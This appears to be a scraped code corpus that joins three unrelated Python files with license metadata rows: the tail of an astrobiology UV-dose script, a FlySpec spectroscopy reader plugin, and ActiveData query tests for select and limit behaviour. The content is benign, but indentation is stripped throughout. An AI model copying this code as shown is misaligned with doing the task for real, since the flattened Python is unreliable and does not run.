gasmultiples['h2s']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5, 1.e6, 1.e7])
#####In a loop, extract the files and compute the statistics
for gasind in range(0, len(gaslist)):
gas=gaslist[gasind]
base_abundance=base_abundances[gasind]
multiples=gasmultiples[gas]
for multind in range(0, len(multiples)):
multiple=multiples[multind]
colden_X=base_abundance*multiple*N_tot #total column density of gas X
datafile='./TwoStreamOutput/gaslim/surface_intensities_'+gas+'limits_'+gas+'multiple='+str(multiple)+'_a=newsnow_z=0.dat'
left, right, surface_int=get_UV(datafile)
intrad100_165=integrated_radiance(left, right, surface_int, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300=integrated_radiance(left, right, surface_int, 200., 300.) #This is just an empirical gauge.
umpgly_193=ump_glycosidic_photol(left, right, surface_int, 193., False, False)
umpgly_230=ump_glycosidic_photol(left, right, surface_int,230., False, False)
umpgly_254=ump_glycosidic_photol(left, right, surface_int, 254., False, False)
tricyano254=tricyano_aqe_prodrate(left, right, surface_int, 254., False, False)
tricyano300=tricyano_aqe_prodrate(left, right, surface_int, 300., False, False)
line=np.array([gas, colden_X, intrad100_165/intrad100_165_base,intrad200_300/intrad200_300_base, umpgly_193/umpgly_193_base, umpgly_230/umpgly_230_base, umpgly_254/umpgly_254_base, tricyano254/tricyano254_base, tricyano300/tricyano300_base])
if (multind==0):
altgastable=line #need to initialize in this case
else:
altgastable=np.vstack((altgastable, line))
f=open('./Doses/'+gas+'_uv_doses.dat','w')
f.write('All Dosimeters Normalized to Space Radiation Case\n')
np.savetxt(f, altgastable, delimiter=' & ', fmt='%s', newline='\n', header='Gas & Column Density (cm-2) & Radiance (100-165 nm) & Radiance (200-300 nm) & UMP Gly Cleavage (lambda0=193nm) & UMP Gly Cleavage (lambda0=230nm) & UMP Gly Cleavage (lambda0=254nm) & CuCN3 Photoionization (lambda0=254 nm) & CuCN3 Photoionization (lambda0=300 nm)\n')
f.close()
#Wrap Up
########################
###Wrap Up
########################
plt.show()
| mit | -5,561,900,649,416,079,000 | 54.317254 | 825 | 0.713442 | false |
nonbiostudent/python-spectroscopy | src/spectroscopy/plugins/flyspec.py | 1 | 8319 | """
Plugin to read and write FlySpec data.
"""
import calendar
import datetime
import os
import numpy as np
from spectroscopy.dataset import Dataset, Spectra, ResourceIdentifier, Retrievals
from spectroscopy.plugins import DatasetPluginBase
class FlySpecPluginException(Exception):
pass
class FlySpecPlugin(DatasetPluginBase):
def open(self, filename, format=None, timeshift=0.0, **kargs):
"""
Load data from FlySpec instruments.
:param timeshift: float
:type timeshift: FlySpecs record data in local time so a timeshift in
hours of local time with respect to UTC can be given. For example
`timeshift=12.00` will subtract 12 hours from the recorded time.
"""
# load data and convert southern hemisphere to negative
# latitudes and western hemisphere to negative longitudes
def todd(x):
"""
Convert degrees and decimal minutes to decimal degrees.
"""
idx = x.find('.')
minutes = float(x[idx - 2:]) / 60.
deg = float(x[:idx - 2])
return deg + minutes
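        #e.g. todd('17233.56') -> 172 + 33.56/60 = 172.559... (DDDMM.MM-style GPS input)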
data = np.loadtxt(filename, usecols=range(0, 21),
converters={
8: todd,
9: lambda x: -1.0 if x.lower() == 's' else 1.0,
10: todd,
11: lambda x: -1.0 if x.lower() == 'w' else 1.0})
if len(data.shape) < 2:
raise FlySpecPluginException(
'File %s contains only one data point.'
% (os.path.basename(filename)))
ts = -1. * timeshift * 60. * 60.
int_times = np.zeros(data[:, :7].shape, dtype='int')
int_times[:, :6] = data[:, 1:7]
# convert decimal seconds to milliseconds
int_times[:, 6] = (data[:, 6] - int_times[:, 5]) * 1000
times = [datetime.datetime(*int_times[i, :]) +
datetime.timedelta(seconds=ts)
for i in range(int_times.shape[0])]
unix_times = [calendar.timegm(i.utctimetuple()) for i in times]
latitude = data[:, 8] * data[:, 9]
longitude = data[:, 10] * data[:, 11]
elevation = data[:, 12]
so2 = data[:, 16]
angles = data[:, 17]
s = Spectra(self, angle=np.zeros(angles.shape),
position=np.zeros((latitude.size, 3)),
time=np.zeros(angles.shape))
slice_start = 0
slice_end = slice_start
self.d = Dataset(self, spectra=[s])
for a in self._split_by_scan(angles, unix_times, longitude,
latitude, elevation, so2):
slice_end = slice_start + a[0].size
s.angle[slice_start:slice_end] = a[0]
s.time[slice_start:slice_end] = a[1]
position = np.vstack((a[2], a[3], a[4])).T
s.position[slice_start:slice_end, :] = position
r = Retrievals(self,
spectra_id=ResourceIdentifier(s.resource_id.id),
type='FlySpec', gas_species='SO2',
slice=slice(slice_start, slice_end), sca=a[5])
self.d.retrievals.append(r)
slice_start = slice_end
# Consistency check to make sure no data was dropped during slicing
assert s.angle.std() == angles.std()
return self.d
def _array_multi_sort(self, *arrays):
"""
Sorts multiple numpy arrays based on the contents of the first array.
>>> x1 = np.array([4.,5.,1.,2.])
>>> x2 = np.array([10.,11.,12.,13.])
>>> f = FlySpecPlugin()
>>> f._array_multi_sort(*tuple([x1,x2]))
(array([ 1., 2., 4., 5.]), array([ 12., 13., 10., 11.]))
"""
c = np.rec.fromarrays(
arrays, names=[str(i) for i in range(len(arrays))])
c.sort() # sort based on values in first array
return tuple([c[str(i)] for i in range(len(arrays))])
def _split_by_scan(self, angles, *vars_):
"""
Returns an iterator that will split lists/arrays of data by scan (i.e.
between start and end angle) an arbitrary number of lists of data can
be passed in - the iterator will return a list of arrays of length
len(vars_) + 1 with the split angles array at index one, and the
remaining data lists in order afterwards. The lists will be sorted
into ascending angle order.
>>> angles = np.array([30, 35, 40, 35, 30, 35, 40])
>>> f = FlySpecPlugin()
>>> [a[0] for a in f._split_by_scan(angles)]
[array([30, 35, 40]), array([30, 35]), array([35, 40])]
>>> [a[1] for a in f._split_by_scan(angles, np.array([1,2,3,4,5,6,7]))]
[array([1, 2, 3]), array([5, 4]), array([6, 7])]
"""
# everything breaks if there are more than two equal angles in a row.
if np.any(np.logical_and((angles[1:] == angles[:-1])[:-1],
angles[2:] == angles[:-2])):
idx = np.argmax(np.logical_and(
(angles[1:] == angles[:-1])[:-1], angles[2:] == angles[:-2]))
            raise ValueError("Data at line " + str(idx + 2) +
                             " contains three or more repeated angle entries (in a row). "
                             "Don't know how to split this into scans.")
anglegradient = np.zeros(angles.shape)
anglegradient[1:] = np.diff(angles)
# if there are repeated start or end angles, then you end up with zeros
# in the gradients. Possible zeros at the start need to be dealt with
# separately, otherwise you end up with the first point being put in a
# scan of its own.
if anglegradient[1] == 0:
anglegradient[1] = anglegradient[2]
if anglegradient[-1] == 0:
anglegradient[-1] = anglegradient[-2]
anglegradient[0] = anglegradient[1]
# replace zero gradients within the array with the value of its left
# neighbour
b = np.roll(anglegradient, 1)
b[0] = anglegradient[0]
anglegradient = np.where(np.abs(anglegradient) > 0, anglegradient, b)
firstarray = anglegradient > 0
secondarray = np.copy(firstarray)
secondarray[1:] = secondarray[0:-1]
secondarray[0] = not secondarray[0]
inflectionpoints = np.where(firstarray != secondarray)[0]
if len(inflectionpoints) < 2:
yield self._array_multi_sort(angles, *vars_)
else:
d = [angles[:inflectionpoints[1]]]
for l in vars_:
d.append(l[0:inflectionpoints[1]:])
yield self._array_multi_sort(*tuple(d))
i = 1
while i < len(inflectionpoints) - 1:
if inflectionpoints[i + 1] - inflectionpoints[i] < 2:
inflectionpoints[i + 1] = inflectionpoints[i]
i += 1
continue
d = [angles[inflectionpoints[i]: inflectionpoints[i + 1]]]
for l in vars_:
d.append(l[inflectionpoints[i]: inflectionpoints[i + 1]])
i += 1
yield self._array_multi_sort(*tuple(d))
# the final point is not an inflection point so now we need to
# return the final scan
d = [angles[inflectionpoints[i]:]]
for l in vars_:
d.append(l[inflectionpoints[i]:])
yield self._array_multi_sort(*tuple(d))
def close(self, filename):
raise Exception('Close is undefined for the FlySpec backend')
def get_item(self, path):
_e = path.split('/')
id = _e[1]
name = _e[2]
ref_o = ResourceIdentifier(id).get_referred_object()
return ref_o.__dict__[name]
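        # The path is assumed to look like '/<resource_id>/<attribute_name>'
        # (e.g. '/<id-of-a-Spectra-object>/angle'), based on the split('/') indexing above.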
def set_item(self, path, value):
_e = path.split('/')
id = _e[1]
name = _e[2]
ref_o = ResourceIdentifier(id).get_referred_object()
ref_o.__dict__[name] = value
def create_item(self, path, value):
pass
def new(self, filename=None):
self._root = FlySpecPlugin()
@staticmethod
def get_format():
return 'flyspec'
if __name__ == '__main__':
import doctest
doctest.testmod()
| gpl-3.0 | 7,344,202,771,692,823,000 | 38.42654 | 81 | 0.538406 | false |
maggienj/ActiveData | tests/test_jx/test_set_ops.py | 1 | 34963 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import division
from __future__ import unicode_literals
from mo_dots import wrap
from mo_math import Math
from unittest import skipIf
from jx_python.query import DEFAULT_LIMIT, MAX_LIMIT
from tests.test_jx import BaseTestCase, TEST_TABLE, global_settings, NULL
lots_of_data = wrap([{"a": i} for i in range(30)])
class TestSetOps(BaseTestCase):
def test_star(self):
test = {
"data": [{"a": 1}],
"query": {
"select": "*",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [{"a": 1}]
}
}
self.utils.execute_tests(test)
def test_simplest(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE,
"select": "a"
},
"expecting_list": {
"meta": {"format": "list"}, "data": ["b"]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"a": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_select_on_missing_field(self):
test = {
"data": [
{"a": {"b": {"c": 1}}},
{"a": {"b": {"c": 2}}},
{"a": {"b": {"c": 3}}},
{"a": {"b": {"c": 4}}},
{"a": {"b": {"c": 5}}}
],
"query": {
"from": TEST_TABLE,
"select": "a.b.d"
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{},
{},
{},
{},
{}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b.d"],
"data": [[NULL], [NULL], [NULL], [NULL], [NULL]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 5, "interval": 1}
}
],
"data": {
"a.b.d": [NULL, NULL, NULL, NULL, NULL]
}
}
}
self.utils.execute_tests(test)
def test_select_on_shallow_missing_field(self):
test = {
"data": [
{"a": {"b": {"c": 1}}},
{"a": {"b": {"c": 2}}},
{"a": {"b": {"c": 3}}},
{"a": {"b": {"c": 4}}},
{"a": {"b": {"c": 5}}}
],
"query": {
"from": TEST_TABLE,
"select": "d"
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{},
{},
{},
{},
{}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["d"],
"data": [[NULL], [NULL], [NULL], [NULL], [NULL]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 5, "interval": 1}
}
],
"data": {
"d": [NULL, NULL, NULL, NULL, NULL]
}
}
}
self.utils.execute_tests(test)
def test_single_deep_select(self):
test = {
"data": [
{"a": {"b": {"c": 1}}},
{"a": {"b": {"c": 2}}},
{"a": {"b": {"c": 3}}},
{"a": {"b": {"c": 4}}},
{"a": {"b": {"c": 5}}}
],
"query": {
"from": TEST_TABLE,
"select": "a.b.c",
"sort": "a.b.c" # SO THE CUBE COMPARISON WILL PASS
},
"expecting_list": {
"meta": {"format": "list"},
"data": [1, 2, 3, 4, 5]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b.c"],
"data": [[1], [2], [3], [4], [5]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 5, "interval": 1}
}
],
"data": {
"a.b.c": [1, 2, 3, 4, 5]
}
}
}
self.utils.execute_tests(test)
def test_single_select_alpha(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE,
"select": "a"
},
"expecting_list": {
"meta": {"format": "list"}, "data": ["b"]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"a": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_single_rename(self):
test = {
"name": "rename singleton alpha",
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"}
},
"expecting_list": {
"meta": {"format": "list"}, "data": ["b"]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["value"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"value": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_single_no_select(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a": "b"}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["."],
"data": [[{"a": "b"}]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
".": [{"a": "b"}]
}
}
}
self.utils.execute_tests(test)
def test_id_select(self):
"""
ALWAYS GOOD TO HAVE AN ID, CALL IT "_id"
"""
test = {
"data": [
{"a": "b"}
],
"query": {
"select": "_id",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"_id": Math.is_hex}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["_id"],
"data": [[Math.is_hex]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"_id": [Math.is_hex]
}
}
}
self.utils.execute_tests(test)
def test_id_value_select(self):
"""
ALWAYS GOOD TO HAVE AN ID, CALL IT "_id"
"""
test = {
"data": [
{"a": "b"}
],
"query": {
"select": "_id",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
Math.is_hex
]
}
}
self.utils.execute_tests(test)
def test_single_star_select(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"select": "*",
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a": "b"}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"a": ["b"]
}
}
}
self.utils.execute_tests(test)
def test_dot_select(self):
test = {
"data": [
{"a": "b"}
],
"query": {
"select": {"name": "value", "value": "."},
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"},
"data": [{"a": "b"}]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["value"],
"data": [[{"a": "b"}]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 1, "interval": 1}
}
],
"data": {
"value": [{"a": "b"}]
}
}
}
self.utils.execute_tests(test)
@skipIf(global_settings.use == "elasticsearch", "ES only accepts objects, not values")
def test_list_of_values(self):
test = {
"data": ["a", "b"],
"query": {
"from": TEST_TABLE
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
"a", "b"
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["."],
"data": [["a"], ["b"]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 2, "interval": 1}
}
],
"data": {
".": ["a", "b"]
}
}
}
self.utils.execute_tests(test)
def test_select_all_from_list_of_objects(self):
test = {
"data": [
{"a": "b"},
{"a": "d"}
],
"query": {
"from": TEST_TABLE,
"select": "*"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"a": "b"},
{"a": "d"}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [
["b"],
["d"]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 2, "interval": 1}
}
],
"data": {
"a": ["b", "d"]
}
}
}
self.utils.execute_tests(test)
@skipIf(True, "Too complicated")
def test_select_into_children(self):
test = {
"name": "select into children to table",
"metadata": {
"properties": {
"x": {"type": "integer"},
"a": {
"type": "nested",
"properties": {
"y": {
"type": "string"
},
"b": {
"type": "nested",
"properties": {
"c": {"type": "integer"},
"1": {"type": "integer"}
}
},
"z": {
"type": "string"
}
}
}
}
},
"data": [
{"x": 5},
{
"a": [
{
"b": {"c": 13},
"y": "m"
},
{
"b": [
{"c": 17, "1": 27},
{"c": 19}
],
"y": "q"
},
{
"y": "r"
}
],
"x": 3
},
{
"a": {"b": {"c": 23}},
"x": 7
},
{
"a": {"b": [
{"c": 29, "1": 31},
{"c": 37, "1": 41},
{"1": 47},
{"c": 53, "1": 59}
]},
"x": 11
}
],
"query": {
"from": TEST_TABLE + ".a.b",
"select": ["...x", "c"]
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"x": 5, "c": NULL},
{"x": 3, "c": 13},
{"x": 3, "c": 17},
{"x": 3, "c": 19},
{"x": 7, "c": 23},
{"x": 11, "c": 29},
{"x": 11, "c": 37},
{"x": 11, "c": NULL},
{"x": 11, "c": 53}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["x", "c"],
"data": [
[5, NULL],
[3, 13],
[3, 17],
[3, 19],
[7, 23],
[11, 29],
[11, 37],
[11, NULL],
[11, 53]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "index",
"domain": {"type": "rownum", "min": 0, "max": 9, "interval": 1}
}
],
"data": {
"x": [5, 3, 3, 3, 7, 11, 11, 11, 11],
"c": [NULL, 13, 17, 19, 23, 29, 37, NULL, 53]
}
}
}
self.utils.execute_tests(test)
@skipIf(global_settings.use=="sqlite", "no need for limit when using own resources")
def test_max_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
"limit": 1000000000
}
})
self.utils.fill_container(test)
result = self.utils.execute_query(test.query)
self.assertEqual(result.meta.es_query.size, MAX_LIMIT)
def test_default_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
},
})
self.utils.fill_container(test)
test.query.format = "list"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), DEFAULT_LIMIT)
test.query.format = "table"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), DEFAULT_LIMIT)
test.query.format = "cube"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data.value), DEFAULT_LIMIT)
def test_specific_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
"limit": 5
},
})
self.utils.fill_container(test)
test.query.format = "list"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), 5)
test.query.format = "table"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data), 5)
test.query.format = "cube"
result = self.utils.execute_query(test.query)
self.assertEqual(len(result.data.value), 5)
def test_negative_limit(self):
test = wrap({
"data": lots_of_data,
"query": {
"from": TEST_TABLE,
"select": {"name": "value", "value": "a"},
"limit": -1
},
})
self.utils.fill_container(test)
test.query.format = "list"
self.assertRaises(Exception, self.utils.execute_query, test.query)
def test_select_w_star(self):
test = {
"data": [
{"a": {"b": 0, "c": 0}, "d": 7},
{"a": {"b": 0, "c": 1}},
{"a": {"b": 1, "c": 0}},
{"a": {"b": 1, "c": 1}}
],
"query": {
"from": TEST_TABLE,
"select": "*",
"sort": ["a.b", "a.c"]
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a.b": 0, "a.c": 0, "d": 7},
{"a.b": 0, "a.c": 1},
{"a.b": 1, "a.c": 0},
{"a.b": 1, "a.c": 1}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b", "a.c", "d"],
"data": [
[0, 0, 7],
[0, 1, NULL],
[1, 0, NULL],
[1, 1, NULL]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": [0, 0, 1, 1],
"a.c": [0, 1, 0, 1],
"d": [7, NULL, NULL, NULL]
}
}
}
self.utils.execute_tests(test)
def test_select_w_deep_star(self):
test = {
"data": [
{"a": {"b": 0, "c": 0}},
{"a": {"b": 0, "c": 1}},
{"a": {"b": 1, "c": 0}},
{"a": {"b": 1, "c": 1}},
],
"query": {
"from": TEST_TABLE,
"select": "a.*",
"sort": ["a.b", "a.c"]
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"a.b": 0, "a.c": 0},
{"a.b": 0, "a.c": 1},
{"a.b": 1, "a.c": 0},
{"a.b": 1, "a.c": 1}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b", "a.c"],
"data": [
[0, 0],
[0, 1],
[1, 0],
[1, 1]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": [0, 0, 1, 1],
"a.c": [0, 1, 0, 1]
}
}
}
self.utils.execute_tests(test)
def test_select_expression(self):
test = {
"data": [
{"a": {"b": 0, "c": 0}},
{"a": {"b": 0, "c": 1}},
{"a": {"b": 1, "c": 0}},
{"a": {"b": 1, "c": 1}},
],
"query": {
"from": TEST_TABLE,
"select": [
{"name": "sum", "value": {"add": ["a.b", "a.c"]}},
{"name": "sub", "value": {"sub": ["a.b", "a.c"]}}
],
"sort": ["a.b", "a.c"]
},
"expecting_list": {
"meta": {"format": "list"}, "data": [
{"sum": 0, "sub": 0},
{"sum": 1, "sub": -1},
{"sum": 1, "sub": 1},
{"sum": 2, "sub": 0}
]},
"expecting_table": {
"meta": {"format": "table"},
"header": ["sum", "sub"],
"data": [[0, 0], [1, -1], [1, 1], [2, 0]]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"sum": [0, 1, 1, 2],
"sub": [0, -1, 1, 0]
}
}
}
self.utils.execute_tests(test)
def test_select_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["a"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"a": {"b": "x", "v": 2}},
{"a": {"b": "x", "v": 5}},
{"a": {"b": "x", "v": 7}},
{}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [
[{"b": "x", "v": 2}],
[{"b": "x", "v": 5}],
[{"b": "x", "v": 7}],
[{}]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
]
}
}
}
self.utils.execute_tests(test)
def test_select_leaves(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["a.*"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"a.b": "x", "a.v": 2},
{"a.b": "x", "a.v": 5},
{"a.b": "x", "a.v": 7},
{}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a.b", "a.v"],
"data": [
["x", 2],
["x", 5],
["x", 7],
[NULL, NULL]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": ["x", "x", "x", NULL],
"a.v": [2, 5, 7, NULL]
}
}
}
self.utils.execute_tests(test)
def test_select_value_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": "a",
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["a"],
"data": [
[{"b": "x", "v": 2}],
[{"b": "x", "v": 5}],
[{"b": "x", "v": 7}],
[{}]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
]
}
}
}
self.utils.execute_tests(test)
def test_select2_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["o", "a"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["o", "a"],
"data": [
[3, {"b": "x", "v": 2}],
[1, {"b": "x", "v": 5}],
[2, {"b": "x", "v": 7}],
[4, {}]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a": [
{"b": "x", "v": 2},
{"b": "x", "v": 5},
{"b": "x", "v": 7},
{}
],
"o": [3, 1, 2, 4]
}
}
}
self.utils.execute_tests(test)
def test_select3_object(self):
"""
ES DOES NOT ALLOW YOU TO SELECT AN OBJECT, ONLY THE LEAVES
THIS SHOULD USE THE SCHEMA TO SELECT-ON-OBJECT TO MANY SELECT ON LEAVES
"""
test = {
"data": [
{"o": 3, "a": {"b": "x", "v": 2}},
{"o": 1, "a": {"b": "x", "v": 5}},
{"o": 2, "a": {"b": "x", "v": 7}},
{"o": 4, "c": "x"}
],
"query": {
"from": TEST_TABLE,
"select": ["o", "a.*"],
"sort": "a.v"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
{"o": 3, "a.b": "x", "a.v": 2},
{"o": 1, "a.b": "x", "a.v": 5},
{"o": 2, "a.b": "x", "a.v": 7},
{"o": 4}
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["o", "a.b", "a.v"],
"data": [
[3, "x", 2],
[1, "x", 5],
[2, "x", 7],
[4, NULL, NULL]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 4, "interval": 1}
}
],
"data": {
"a.b": ["x", "x", "x", NULL],
"a.v": [2, 5, 7, NULL],
"o": [3, 1, 2, 4]
}
}
}
self.utils.execute_tests(test)
def test_select_nested_column(self):
test = {
"data": [
{"_a": [{"b": 1, "c": 1}, {"b": 2, "c": 1}]},
{"_a": [{"b": 1, "c": 2}, {"b": 2, "c": 2}]}
],
"query": {
"from": TEST_TABLE,
"select": "_a"
},
"expecting_list": {
"meta": {"format": "list"},
"data": [
[{"b": 1, "c": 1}, {"b": 2, "c": 1}],
[{"b": 1, "c": 2}, {"b": 2, "c": 2}]
]
},
"expecting_table": {
"meta": {"format": "table"},
"header": ["_a"],
"data": [
[[{"b": 1, "c": 1}, {"b": 2, "c": 1}]],
[[{"b": 1, "c": 2}, {"b": 2, "c": 2}]]
]
},
"expecting_cube": {
"meta": {"format": "cube"},
"edges": [
{
"name": "rownum",
"domain": {"type": "rownum", "min": 0, "max": 2, "interval": 1}
}
],
"data": {
"_a": [
[{"b": 1, "c": 1}, {"b": 2, "c": 1}],
